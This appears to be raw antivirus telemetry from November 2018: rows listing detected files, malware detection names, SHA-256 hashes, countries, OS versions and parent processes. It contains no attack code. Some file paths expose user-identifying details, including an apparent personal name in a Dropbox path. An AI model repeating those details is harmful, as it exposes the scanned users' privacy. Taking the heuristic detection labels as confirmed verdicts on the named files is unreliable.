  Row(detection=Row(filename='mitsubishilancerevovii_by_sin5k4.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\MitsubishiLancerEvoVII_by_Sin5k4\\MitsubishiLancerEvoVII_by_Sin5k4.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='09e0203f53d490660659f67271769b459ac9fcfd495094936ae7c3317026fadb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:38:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c4f8770d08a4d70d44fefa5205045151274c81ccab9e3d90f26b7f641561ebf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C4F8770D08A4D70D44FEFA5205045151274C81CCAB9E3D90F26B7F641561EBF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1c4f8770d08a4d70d44fefa5205045151274c81ccab9e3d90f26b7f641561ebf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tprecphs5_01047.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Testing Program 2016 Cloud\\Visor\\Photoshop\\TPRECPHS5_01047.exe', filesize=1452000, name='HEUR/APC.#M1.#R1'), hash='218001c21ac47fb8db0614c83852919ad66d6c93745492ba7d8531e75ac3c952', metadata=Row(cmdline=None, country='SV', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:03:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdfplus.exe', filepath='C:\\Program Files\\Nuance\\PDF Viewer Plus\\bin\\PDFPlus.exe', filesize=3840000, name='W32/Virut.Gen.#M0.#R0'), hash='080aaa7c0cd8474ba5e091586e7485550ce444be98bd5c0795039ab27125a01d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T11:57:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2d6fd5b740a7f51298cd7047631a42895c721d95afd78155de062e58cc9df6ee', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2D6FD5B740A7F51298CD7047631A42895C721D95AFD78155DE062E58CC9DF6EE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2d6fd5b740a7f51298cd7047631a42895c721d95afd78155de062e58cc9df6ee', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:13:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='m5.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\ZBD\\M5\\M5.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1af8cbad8436e05a98ea561933d87ba9c585bd9508ba49ff7cff86234ddbb448', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134357-93e4b75b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134357-93E4B75B', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='45af74e0ae4dacfa58f8fa193ab0d91bde12562775fe6d678ebe46b5538ae494', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\45AF74E0AE4DACFA58F8FA193AB0D91BDE12562775FE6D678EBE46B5538AE494', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='45af74e0ae4dacfa58f8fa193ab0d91bde12562775fe6d678ebe46b5538ae494', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:43:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052843-21ee637a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052843-21EE637A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050317-94b9b3a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050317-94B9B3A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061254-4e8232be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061254-4E8232BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055256-84878732', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055256-84878732', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX11.088\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX11.088\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:15:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa3368.27184\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa3368.27184\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T02:04:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055629-037c5bc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055629-037C5BC6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050801-3da886c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050801-3DA886C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052220-3e006ddb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052220-3E006DDB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051755-a02eb830', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051755-A02EB830', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061056-3b45d02b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b05b3c72\\AVSCAN-20181102-060736-2087495F\\AVSCAN-20181102-061056-3B45D02B', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202126-30565e85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d4825ca6\\AVSCAN-20181102-202116-2E1B5B25\\AVSCAN-20181102-202126-30565E85', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:21:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054755-d0a915c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054755-D0A915C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131927-ee634422', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-131927-EE634422', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:22:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144134-81d97daa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-144134-81D97DAA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051711-85bcc1f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051711-85BCC1F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cgkenhvw.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\CGkEnhvW.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sfx.exe', filepath='I:\\ألعاب\\Games 1\\بولنج\\MIXOLGY.NET_Bowling.Hawaiian.Vacationd. _By  MIDOPOP\\sfx\\sfx.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='607dc9068a416a57dbd52e6cd60ab12dc6e481e5dd7eb93465cf3752df6b259d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055623-ff909222', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055623-FF909222', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181903-fccf7e69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6e3d848e\\AVSCAN-20181102-174133-67CF7468\\AVSCAN-20181102-181903-FCCF7E69', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:18:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055701-168a82b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055701-168A82B9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053150-91c18811', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053150-91C18811', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060307-f0a1e66a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060307-F0A1E66A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052725-f3ebf7fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052725-F3EBF7FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052721-f19a925c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052721-F19A925C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055159-625ff5dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055159-625FF5DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061707-e5470bf2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061707-E5470BF2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060851-bdc2693a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060851-BDC2693A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:50Z'), dt=datetime.date(2018, 11, 2)),
